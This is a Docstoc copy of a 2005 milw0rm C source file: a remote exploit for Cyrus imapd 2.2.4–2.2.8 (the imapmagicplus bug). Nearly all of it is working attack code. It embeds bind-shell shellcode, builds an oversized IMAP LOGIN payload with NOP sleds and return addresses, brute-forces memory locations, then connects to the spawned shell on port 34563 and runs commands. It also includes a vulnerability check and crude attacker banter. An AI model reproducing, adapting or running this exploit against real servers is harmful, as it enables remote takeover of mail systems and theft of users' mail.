Docstoc

Cyrus imapd 2.2.4 2.2.8 imapmagicplus Remote Exploit

Document Sample
Cyrus imapd 2.2.4 2.2.8 imapmagicplus Remote Exploit Powered By Docstoc
					                                Cyrus imapd 2.2.4 2.2.8 imapmagicplus Remote Exploit                    Page 1/8
  1    /********************************************************************************************
  2     *                                                                                          *
  3     *                 Cyrus imapd v 2.2.4 − 2.2.8 (imapmagicplus) Remote Exploit               *
  4     *                                   By crash−x / unl0ck                                    *
  5     *                               Bug found by Stefan Esser                                  *
  6     *                           www.unl0ck.org / www.coredumped.info                           *
  7     *                          crash−x@unl0ck.org / crash.ix@gmail.com                         *
  8     *                                                                                          *
  9     * Greets to: all GOTFault ex−member, unl0ck, scozar, eos−india, xesio and all my other     *
  10    *             friends                                                                      *
  11    *                                                                                          *
  12    * Thanks to: n2n                                                                           *
  13    *                                                                                          *
  14    * Why:        This was GOTFault code but Im releasing it with unl0ck. The only reason      *
  15    *             Im releasing it is that somebody leaked it. We didnt want to release any     *
  16    *             GOTFault stuff or give it to anyone besides GOTFault members. But somehow    *
  17    *             stuff got leaked and we had some problems in the team. tal0n disappeared     *
  18    *             and GOTFault doesnt exist anymore.                                           *
  19    *             Im sorry about GOTFault and I hope tal0n has a good time wherever he is and *
  20    *             whatever he is doing.                                                        *
  21    *                                                                                          *
  22    ********************************************************************************************/
  23
  24   #include    <stdio.h>
  25   #include    <stdlib.h>
  26   #include    <stdarg.h>
  27   #include    <string.h>
  28   #include    <sys/types.h>
  29   #include    <sys/socket.h>
  30   #include    <sys/time.h>
  31   #include    <netinet/in.h>
  32   #include    <arpa/inet.h>
  33   #include    <unistd.h>
  34   #include    <netdb.h>
  35
  36   #define RET_BF_START 0x08000000
  37   #define RET_BF_END 0x08600000
  38
  39   #define SHELL_PORT "34563"
  40   #define SHELL_COMMAND "uname −a; id;"
  41
  42   char shellcode[] = /* thanks metasploit! */
  43   "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x16\x81\x73\x17\xb4\x1e"
  44   "\xc2\x86\x83\xeb\xfc\xe2\xf4\x85\xc5\x35\x65\x04\x78\x91\xc5\xe7"
  45   "\x5d\x91\x0f\x55\x55\x0f\x06\x3d\xd9\x90\xe0\xdc\x99\xc1\xc5\xd2"
  46   "\x4d\x4b\x67\x04\x0e\x92\xd7\xe3\x97\x23\x36\xd2\xd3\x42\x36\xd2"
  47   "\xad\xc6\x4b\x34\x4e\x92\xd1\x3d\xff\x81\x36\xd2\xd3\x42\x0f\x6d"
  48   "\x97\x01\x36\x8b\x57\x0f\x06\xf5\xfc\x3a\xd7\xdc\x70\xed\xf5\xdc"
  49   "\x76\xed\xa9\xd6\x77\x4b\x65\xe5\x4d\x4b\x67\x04\x15\x0f\x06";
  50
  51
  52   struct targ{
crash−x                                                                                                 03/29/2005
                                Cyrus imapd 2.2.4 2.2.8 imapmagicplus Remote Exploit          Page 2/8
  53        char *platform;
  54        int retloc;
  55    } targets[]= {
  56        { "Debian 3.1 − Cyrus imapd 2.2.8", 0x0812893c },
  57        { NULL }
  58    };
  59
  60
  61    void usage(char *a){
  62        int i;
  63
  64        printf("[−] Usage: %s −h <host> [options]\n", a);
  65        printf("[!] Options:\n");
  66        printf("\t\t−h\tHostname which you want attack (required)\n");
  67        printf("\t\t−p\tPort of the imapd (default: 143)\n");
  68        printf("\t\t−t\tTarget (default: 0)\n");
  69        printf("\t\t−S\tBruteforce start address (default: 0x%x)\n", RET_BF_START);
  70        printf("\t\t−E\tBruteforce end address (default: 0x%x)\n", RET_BF_END);
  71        printf("\t\t−P\tPayload size (default: 10000)\n");
  72        printf("\t\t−s\tHow long to sleep before try connect to shell (default: 1)\n");
  73        printf("\t\t−v\tOnly vulncheck\n");
  74        printf("\t\t−V\tNo vulncheck\n");
  75        printf("[!] Targets:\n");
  76        for(i = 0; targets[i].platform; i++)
  77            printf("\t\t%d\t %s\n", i, targets[i].platform);
  78        printf("\t\t1337\t All Linux Distros (bruteforce)\n");
  79        exit(1);
  80    }
  81
  82    int sockprintf(int sock, const char *s, ...){
  83        char *ptr;
  84        int bytes;
  85        va_list arg;
  86        va_start(arg, s);
  87        if(vasprintf(&ptr, s, arg) == −1){
  88            free(ptr);
  89            return −1;
  90        }
  91        va_end(arg);
  92        if((bytes = send(sock, ptr, strlen(ptr), 0)) == −1){
  93            free(ptr);
  94            return −1;
  95        }
  96        free(ptr);
  97        return bytes;
  98    }
  99
  100
  101   void check(char *ptr){
  102       int i;
  103
  104       for(i = 0; i < strlen(ptr); i++){
crash−x                                                                                       03/29/2005
                            Cyrus imapd 2.2.4 2.2.8 imapmagicplus Remote Exploit   Page 3/8
  105           switch(ptr[i]){
  106               case ’\x00’:
  107                   ptr[i] =   0x01;
  108                   break;
  109               case ’\x09’:
  110                   ptr[i] =   0x08;
  111                   break;
  112               case ’\x0a’:
  113                   ptr[i] =   0x0e;
  114                   break;
  115               case ’\x0b’:
  116                   ptr[i] =   0x0e;
  117                   break;
  118               case ’\x0c’:
  119                   ptr[i] =   0x0e;
  120                   break;
  121               case ’\x0d’:
  122                   ptr[i] =   0x0e;
  123                   break;
  124               case ’\x20’:
  125                   ptr[i] =   0x21;
  126                   break;
  127               case ’\x22’:
  128                   ptr[i] =   0x23;
  129                   break;
  130               case ’\x28’:
  131                   ptr[i] =   0x27;
  132                   break;
  133               case ’\x29’:
  134                   ptr[i] =   0x30;
  135                   break;
  136           }
  137       }
  138   }
  139
  140
  141   int resolv(struct sockaddr_in *addr, char *hostn){
  142           struct hostent *host;
  143
  144       if (!inet_aton(hostn, &addr−>sin_addr)){
  145           host = gethostbyname(hostn);
  146           if (host == NULL){
  147               printf("[−] Wasnt able to resolve %s!\n", hostn);
  148               return −1;
  149           }
  150           addr−>sin_addr = *(struct in_addr*)host−>h_addr;
  151       }
  152   }
  153
  154
  155   int conn(struct sockaddr_in addr, int port){
  156       int sock;
crash−x                                                                            03/29/2005
                               Cyrus imapd 2.2.4 2.2.8 imapmagicplus Remote Exploit    Page 4/8
  157
  158       if((sock = socket(PF_INET, SOCK_STREAM, 0)) == −1){
  159           return −1;
  160       }
  161
  162       addr.sin_port = htons(port);
  163       addr.sin_family = AF_INET;
  164
  165       if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == −1){
  166           return −1;
  167           }
  168       return sock;
  169   }
  170
  171
  172   int get_shell(struct sockaddr_in addr, int port, int sleeps){
  173       int sock;
  174       char buffer[1024];
  175       fd_set fds;
  176
  177       sleep(sleeps);
  178
  179       if((sock = conn(addr, port)) == −1)
  180           return (−1);
  181       printf("[+]\n[+] Wooohooo we got a shell!\n");
  182       sockprintf(sock, SHELL_COMMAND"\r\n");
  183       while(1){
  184           FD_ZERO(&fds);
  185           FD_SET(0, &fds);
  186           FD_SET(sock, &fds);
  187
  188            if (select(255, &fds, NULL, NULL, NULL) == −1){
  189                fprintf(stderr,"[−] sending failed\n");
  190                close(sock);
  191                exit(1);
  192            }
  193
  194            memset(buffer, 0x0, sizeof(buffer));
  195            if (FD_ISSET(sock, &fds)){
  196                if (recv(sock, buffer, sizeof(buffer), 0) == −1){
  197                    fprintf(stderr, "[−] Connection closed by remote host!\n");
  198                    close(sock);
  199                    exit(1);
  200                }
  201                fprintf(stderr, "%s", buffer);
  202            }
  203
  204            if (FD_ISSET(0, &fds)){
  205                read(0, buffer, sizeof(buffer));
  206                write(sock, buffer, strlen(buffer));
  207            }
  208       }
crash−x                                                                                03/29/2005
                              Cyrus imapd 2.2.4 2.2.8 imapmagicplus Remote Exploit                     Page 5/8
  209       return 0;
  210   }
  211
  212
  213   void status(int retloc, int retloc2, int retaddr){
  214       static int l=1;
  215
  216       switch(l){
  217            case 1:
  218                printf("[|] ");
  219                break;
  220            case 2:
  221                printf("[/] ");
  222                break;
  223            case 3:
  224                printf("[−] ");
  225                break;
  226            case 4:
  227                printf("[\\] ");
  228                l = 0;
  229                break;
  230       }
  231       printf("Trying retlocs [0x%x − 0x%x] retaddr [0x%x]\r", retloc, retloc2, retaddr);
  232       fflush(stdout);
  233       l++;
  234   }
  235
  236   void gen_payload(char *payload, int p_size, int retloc, int mode){
  237       int i;
  238
  239       memset(payload, 0x0, p_size);
  240       memcpy(payload, "L01 LOGIN ", strlen("L01 LOGIN "));
  241       /* mode == 0 is vulncheck buffer and 1 is attack buffer */
  242       if(mode == 0)
  243           memset(payload+strlen("L01 LOGIN "), ’A’, p_size−strlen("L01 LOGIN "));
  244       else{
  245           for(i=strlen("L01 LOGIN "); i < (p_size−(p_size/10)); i+=4)
  246               *((void **)(payload+i)) = (void *)((retloc+(p_size−(p_size/10/2))));
  247           memset(payload+i, ’\x90’, p_size−i);
  248           *((void **)(payload+562)) = (void *)(retloc);
  249           payload[p_size−5] = ’\0’;
  250           check(payload + strlen("L01 LOGIN "));
  251       }
  252       memcpy(payload+p_size−strlen(shellcode)−strlen(" {5}")−1, shellcode, strlen(shellcode));
  253       memcpy(payload+p_size−strlen(" {5}")−1, " {5}", strlen(" {5}"));
  254       payload[p_size−1] = ’\0’;
  255   }
  256
  257   void vulnchck(struct sockaddr_in addr, int port){
  258       char payload[1024];
  259       int sock;
  260       struct timeval timeout;
crash−x                                                                                                03/29/2005
                                 Cyrus imapd 2.2.4 2.2.8 imapmagicplus Remote Exploit       Page 6/8
  261       fd_set fds;
  262
  263       timeout.tv_sec = 3;
  264       timeout.tv_usec = 0;
  265
  266       printf("[!] Checking if the server is vuln!\n");
  267       if((sock = conn(addr, port)) == −1){
  268           printf("[−] Connecting failed!\n");
  269           exit(1);
  270       }
  271       gen_payload(payload, sizeof(payload), 0x00, 0);
  272       sockprintf(sock, "%s\r\n", payload);
  273       if(recv(sock, payload, sizeof(payload), 0) < 1){
  274           printf("[+] Yeaahaa server is vuln, lets fuck that bitch!\n");
  275           close(sock);
  276           return;
  277       }
  278       printf("[−] Server not vuln!\n");
  279       close(sock);
  280       exit(1);
  281   }
  282
  283
  284   int main(int argc, char **argv){
  285       char *payload = NULL, *hostn = NULL, buffer[1024], *ptr;
  286       int i, first, sock, opt, target = 0, port = 143,
  287           shell_port = atoi(SHELL_PORT), sleeps = 1,
  288           p_size=10000, ret_bf_start = RET_BF_START,
  289           ret_bf_end = RET_BF_END, vulncheck = 1;
  290       fd_set fds;
  291           struct sockaddr_in addr;
  292
  293       printf("[!] Cyrus imapd 2.2.4 − 2.2.8 remote exploit by crash−x / unl0ck\n");
  294
  295       if (argc < 2)
  296           usage(argv[0]);
  297
  298       while ((opt = getopt (argc, argv, "h:p:t:s:P:S:E:vV")) != −1){
  299           switch (opt){
  300                   case ’h’:
  301                        hostn = optarg;
  302                        break;
  303                   case ’p’:
  304                   port = atoi(optarg);
  305                   if(port > 65535 || port < 1){
  306                        printf("[−] Port %d is invalid\n",port);
  307                        return 1;
  308                   }
  309                   break;
  310               case ’t’:
  311                   target = atoi(optarg);
  312                   for(i = 0; targets[i].platform; i++);
crash−x                                                                                     03/29/2005
                              Cyrus imapd 2.2.4 2.2.8 imapmagicplus Remote Exploit                           Page 7/8
  313                   if(target >= i && target != 1337){
  314                       printf("[−] Wtf are you trying to target?\n");
  315                       usage(argv[0]);
  316                   }
  317                   break;
  318               case ’S’:
  319                   ret_bf_start = strtoul(optarg,NULL,0);
  320                   if(!ret_bf_start){
  321                       printf("[−] Wtf thats not a valid bruteforce start address!\n");
  322                       usage(argv[0]);
  323                   }
  324                   break;
  325               case ’E’:
  326                   ret_bf_end = strtoul(optarg,NULL,0);
  327                   if(!ret_bf_end){
  328                       printf("[−] Wtf thats not a valid bruteforce end address!\n");
  329                       usage(argv[0]);
  330                   }
  331                   break;
  332               case ’s’:
  333                   sleeps = atoi(optarg);
  334                   break;
  335               case ’P’:
  336                   p_size = atoi(optarg);
  337                   if(p_size < 1000){
  338                       printf("[−] Its a bad idea to have a payload with less than 1000 bytes :)\n");
  339                       return 1;
  340                   }
  341                   break;
  342               case ’v’:
  343                   vulncheck = 2;
  344                   break;
  345               case ’V’:
  346                   vulncheck = 0;
  347                   break;
  348                   default:
  349                   usage(argv[0]);
  350          }
  351     }
  352
  353     if(hostn == NULL)
  354         usage(argv[0]);
  355
  356     if(payload == NULL){
  357         if(!(payload = malloc(p_size))){
  358             printf("[−] Wasnt able to allocate space for the payload!\n");
  359             return 1;
  360         }
  361     }
  362
  363     resolv(&addr, hostn);
  364

crash−x                                                                                                      03/29/2005
                            Cyrus imapd 2.2.4 2.2.8 imapmagicplus Remote Exploit   Page 8/8
  365       if(vulncheck == 2){
  366           vulnchck(addr, port);
  367           return 1;
  368       }
  369       else if(vulncheck == 1)
  370           vulnchck(addr, port);
  371
  372       if(target != 1337){
  373           ret_bf_start = targets[target].retloc;
  374           ret_bf_end = targets[target].retloc+5;
  375           printf ("[!] Targeting %s\n", targets[target].platform);
  376       } else
  377           printf("[!] Starting bruteforce attack!\n");
  378
  379       for(i = 0, first = 1; ret_bf_start < ret_bf_end; i++, first++){
  380           if((sock = conn(addr, port)) == −1){
  381                if(first != 1)
  382                     printf("\n");
  383                printf("[−] Connecting failed!\n");
  384                break;
  385           }
  386           if(i == 4)
  387                ret_bf_start += (p_size − (p_size/10));
  388           else
  389                ret_bf_start++;
  390           gen_payload(payload, p_size, ret_bf_start, 1);
  391           status(ret_bf_start, ret_bf_start + (p_size − (p_size/10)),
  392                     ret_bf_start + (p_size − (p_size/10/2)));
  393           sockprintf(sock, "%s\r\n", payload);
  394           if(i == 4){
  395                get_shell(addr, shell_port, sleeps);
  396                i = 0;
  397           }
  398           if(ret_bf_start >= ret_bf_end)
  399                printf("[−]\n");
  400           close(sock);
  401       }
  402       printf("[−] Exploit failed!\n");
  403       return 1;
  404   }
  405
  406   // milw0rm.com [2005−03−29]




crash−x                                                                            03/29/2005

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:21
posted:5/24/2010
language:English
pages:8